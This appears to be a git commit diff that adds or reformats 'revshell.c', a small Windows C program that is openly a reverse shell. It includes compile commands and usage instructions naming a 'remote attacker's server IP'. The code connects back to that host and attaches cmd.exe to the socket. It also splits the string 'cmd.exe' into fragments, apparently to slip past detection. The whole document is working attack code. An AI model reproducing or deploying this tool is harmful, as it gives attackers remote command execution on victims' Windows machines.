Simple reverse-shell added.
This commit is contained in:
parent
d81f92ad28
commit
e1162690ea
|
@ -4,12 +4,12 @@
|
||||||
*
|
*
|
||||||
* Compilation:
|
* Compilation:
|
||||||
* - x64
|
* - x64
|
||||||
* $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
|
* $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
|
||||||
* - x86
|
* - x86
|
||||||
* $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
|
* $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
|
||||||
*
|
*
|
||||||
* Usage:
|
* Usage:
|
||||||
* cmd> revshell <IP> <PORT> &
|
* cmd> revshell <IP> <PORT> &
|
||||||
*
|
*
|
||||||
* Where:
|
* Where:
|
||||||
* - ip - remote attacker's server IP
|
* - ip - remote attacker's server IP
|
||||||
|
@ -21,7 +21,7 @@
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
|
|
||||||
#ifdef _MSC_VER
|
#ifdef _MSC_VER
|
||||||
# pragma comment(lib, "ws2_32")
|
# pragma comment(lib, "ws2_32")
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
int main(int argc, char *argv[])
|
int main(int argc, char *argv[])
|
||||||
|
@ -33,38 +33,38 @@ int main(int argc, char *argv[])
|
||||||
|
|
||||||
if (argc < 3)
|
if (argc < 3)
|
||||||
{
|
{
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
const char *hostname = argv[1];
|
const char *hostname = argv[1];
|
||||||
unsigned int port = atoi(argv[2]);
|
unsigned int port = atoi(argv[2]);
|
||||||
|
|
||||||
WSAStartup(MAKEWORD(2,2), &wsaData);
|
WSAStartup(MAKEWORD(2,2), &wsaData);
|
||||||
wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
|
wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
|
||||||
|
|
||||||
struct hostent *host = gethostbyname(hostname);
|
struct hostent *host = gethostbyname(hostname);
|
||||||
strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr)));
|
strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr)));
|
||||||
|
|
||||||
sin.sin_family = AF_INET;
|
sin.sin_family = AF_INET;
|
||||||
sin.sin_port = htons(port);
|
sin.sin_port = htons(port);
|
||||||
sin.sin_addr.s_addr = inet_addr(saddr);
|
sin.sin_addr.s_addr = inet_addr(saddr);
|
||||||
|
|
||||||
WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL);
|
WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL);
|
||||||
if (WSAGetLastError() == 0)
|
if (WSAGetLastError() == 0)
|
||||||
{
|
{
|
||||||
STARTUPINFO sinfo = {0};
|
STARTUPINFO sinfo = {0};
|
||||||
PROCESS_INFORMATION procinfo = {0};
|
PROCESS_INFORMATION procinfo = {0};
|
||||||
|
|
||||||
sinfo.cb = sizeof(sinfo);
|
sinfo.cb = sizeof(sinfo);
|
||||||
sinfo.dwFlags = STARTF_USESTDHANDLES;
|
sinfo.dwFlags = STARTF_USESTDHANDLES;
|
||||||
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock;
|
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock;
|
||||||
|
|
||||||
char *cmd[4] = { "cm", "d.e", "x", "e" };
|
char *cmd[4] = { "cm", "d.e", "x", "e" };
|
||||||
char command[8] = "";
|
char command[8] = "";
|
||||||
snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]);
|
snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]);
|
||||||
|
|
||||||
CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo);
|
CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo);
|
||||||
}
|
}
|
||||||
|
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue